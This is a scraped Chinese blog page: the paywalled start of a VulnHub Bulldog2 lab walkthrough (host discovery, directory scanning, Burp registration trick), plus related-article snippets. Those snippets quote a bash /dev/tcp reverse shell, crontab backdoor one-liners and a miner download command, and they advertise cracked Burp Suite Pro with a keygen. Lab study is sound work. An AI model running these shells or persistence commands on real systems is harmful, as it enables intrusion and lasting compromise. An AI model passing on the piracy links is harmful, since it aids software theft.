VulnHub渗透测试-Bulldog2

最新推荐文章于 2024-06-03 20:29:25 发布
最新推荐文章于 2024-06-03 20:29:25 发布
阅读量324 收藏 1
点赞数 1
分类专栏: VulnHub渗透测试 文章标签: Bulldog2 vulnhub 渗透测试 渗透靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chenzzhenguo/article/details/108865938
版权
文章目录渗透步骤一、主机发现、端口扫描二、Web扫描、漏洞发现三、漏洞利用、GetShell四、权限提升,得到Flag五、种植后门、清理痕迹渗透步骤一、主机发现、端口扫描//主机发现root@kali:~# ifconfigroot@kali:~# nmap -sn 192.168.56.1/24//端口扫描,获取服务、系统版本信息root@kali:~# nmap -sV -O 192.168.56.104//目录扫描root@kali:~# dirb http://192.168.
摘要由CSDN通过智能技术生成

文章目录

渗透步骤

一、主机发现、端口扫描

//主机发现
root@kali:~# ifconfig
root@kali:~# nmap -sn 192.168.56.1/24

//端口扫描,获取服务、系统版本信息
root@kali:~# nmap -sV -O 192.168.56.104

//目录扫描
root@kali:~# dirb http://192.168.56.104

二、Web扫描、漏洞发现

1、JS源码泄露
在这里插入图片描述2、搜索关键字,获取信息

ctrl+f
register

在这里插入图片描述获获取注册用户所涉及的内容类型、传参方式以及注册路径

在这里插入图片描述
获取注册用户时,所需要提供的参数

2、用Burp截包尝试注册用户

抓登录的包,改路径和参数

最低0.47元/天 解锁文章
原味瓜子、
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vuInhub靶场实战系列-bulldog-1
06-03
vuInhub靶场实战系列-bulldog-1
LINUX留后门--教程(五)—— crontab隐藏后门
W小哥
07-08 3154
2.3 留crontab隐藏后门 好不容易拿下一个网站,以后还想继续使用该系统,通常都会留下一些后门,本次我们留下一个crontab隐藏后门 我们把1.sh、2.sh 文件放在本地搭建的web服务上,让受害者去下载执行 1.sh文件内容 #!/bin/bash bash -i >& /dev/tcp/192.168.184.145/5555 0>&1 反弹shell到IP地址:192.168.184.145 2.sh文件内容 (crontab -l;printf "* * *
crontab一句话后门分析
weixin_30394669的博客
12-05 484
正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - 升级猥琐版本 (crontab -l;printf "*/60 *...
kali linux2024安装,破解BurpSuite2023专业版
最新发布
corvus_yun的博客
06-03 1471
BurpSuite Pro 2023专业版、注册机、汉化脚本链接:https://pan.xunlei.com/s/VNzSLAA_VFhI6P3EYCjKKjQuA1提取码:53bk汉化脚本链接:https://pan.xunlei.com/s/VNzSdFbkHnUnvxwO4simsIqlA1提取码:rpz6。
持久化后门crontab
黄都伟
07-06 788
服务器遇到了挖矿程序,wget --quiet http://m247.ltd:36663/.xmrig/0 -O- crontab计划任务导致了该告警的产生。crontab是Linux操作系统中常用的计划任务服务,黑客或恶意程序常常会通过添加修改cron任务使恶意程序定时重复启动,保持驻留。 1.vim /etc/crontab 找到这条命令删除并保存。 2.使用crontab -l 查看,crontab -e进入编辑页面,输入dd,删除, :wq! 保存退出 ...
burpSuitPro破解安装教程
h1825819493的博客
07-12 5341
1、在解压后,如第一次使用BP请先运行 激活脚本 2、启动激活程序后点击 Run ,运行Burp 然后将 License 里面的值复制到 Burp的 key 输入框里,点击 Next : 3、接下来我们要选择使用手动激活点击 Manual activation 4、将如下输入框的值复制到 Request 框里 最后将 Response 的值复制到Burp的激活框第3步里 点击 Next ,激活成功 后续我们 运行 Burp_Chs或全汉化启动,即可正常启动啦
BurpSuite Pro 2023.12.1.2下载与破解-最新版BurpSuite Pro
Tajang的大千世界
01-21 1万+
分享Burp Suite Professional 2023.12.1.2
atomic-bulldog-grid::office_building:基于CSS网格布局CSS(SCSS)网格,具有@supports后退到flexbox
02-05
原子牛头犬网格 :collision: :dog_face: CSS(SCSS)网格,基于具有@supportsCSS网格布局回退到flexbox... Atomic Bulldog是基于原子设计方法的Scss(Sass)样板。 它集成了Node KSS以自动生成实时样式指南/样式库。
BULLDOG-开源
05-27
【标题】"BULLDOG-开源"所涉及的知识点主要围绕着开源工作流解决方案Bulldog以及与其关联的J2EE容器和Tomcat展开。 首先,Bulldog作为一个开源项目,意味着它的源代码对公众开放,允许用户查看、使用、修改并分发...
British Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的British Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
French Bulldog Themes & New Tab-crx插件
03-16
安装扩展程序后,每次启动浏览器选项卡时,您将拥有一个新的French Bulldog。 我们的目标是为世界各地的人们带来出色的新标签。 让我们的团队为您提供新的屏幕标签,让您的生活栩栩如生。 每个新标签页都是真正的...
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址.txt
04-21
Linux应急响应——SSH暴力破解+crontab隐藏后门——事件复现(含靶场环境)下载地址,真实有效,亲测可用。
【安全研究】Linux后渗透常见后门驻留方式分析
weixin_49128886的博客
11-09 1352
Linux后渗透常见后门驻留方式分析
BurpSuite安装和基础使用教程(已破解)
m0_74914256的博客
02-23 6837
Burp Suite 是用于攻击web 应用程序的集成平台。它包含了许多Burp工具,这些不同的burp工具通过协同工作,有效的分享信息,支持以某种工具中的信息为基础供另一种工具使用的方式发起攻击。 它主要用来做安全性渗透测试,可以实现拦截请求、Burp Spider爬虫、漏洞扫描(付费)等类似Fiddler和Postman但比其更强大的功能。那么我们开始安装教程
Burp Suite Pro2.0.11破解版-2018.11.06更新
一路奔跑94的博客
07-16 9044
Burp Suite Pro2.0.11破解版-2018.11.06更新 2018-2-11 Burp1.7.32Burp破解版Burp2.0.07burp2.0Burp最新版 核武器库74268 本文章所有资源均来源于网络收集~ 如果有任何侵权行为请联系admin#ximcx.cn 打不开Burp请使用JDK8,附上下载地址。 http:/...
VulnHub靶机 DC-7 打靶 渗透详细流程
rumil的博客
04-22 902
主机发现—端口扫描—目录爆破发现后台—服务探测—白盒测试(源码当中找配置文件)—ssh远程登录—邮件信息—找到备份文件脚本—发现脚本当中的drush命令—修改后台密码—进入后台—寻找可代码执行或getshell地方—drupal8不允许执行命令(模块)—下载新的插件—getshell—反弹shell—追加反弹命令—提权即可。由于我们上一步骤已经得到了backups.sh脚本属主为root,属组为www-data,所以我们将反弹shell命令添加到脚本当中,等待执行脚本反弹shell即可得到root权限。
BurpSuite安装破解教程(1)
2401_84968101的博客
05-12 630
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
linux隐藏你的crontab后门
渗透测试教程
03-08 851
crontab定时后门 ​ crontab是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。 ​ 注意: 新创建的 cron 任务,不会马上执行,至少要过 2 分钟后才可以,当然你可以重启 cron 来马上执行 ​ 比如我们通过redis写crontab后,管理员上线 执行crontab -l 就会查看到我们留下的可疑命令。那么我们如果躲避管理员的查看呢? ​ 其实 crontab -l 是查看保存在这里 /var/spool/cron
实现一个双向适配器实例,使得猫(Cat)可以学狗(Dog)叫,狗可以学猫抓老鼠。绘制相应类图并使用代码编程模拟。
04-01
bulldog = Bulldog() cat = Cat() adapter = DogAdapter(bulldog) print(adapter.catch_mice()) # Output: Woof! Woof! ``` 在上面的代码中,我们有一个Target接口 `Cat`,它定义了一个`catch_mice()`方法,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值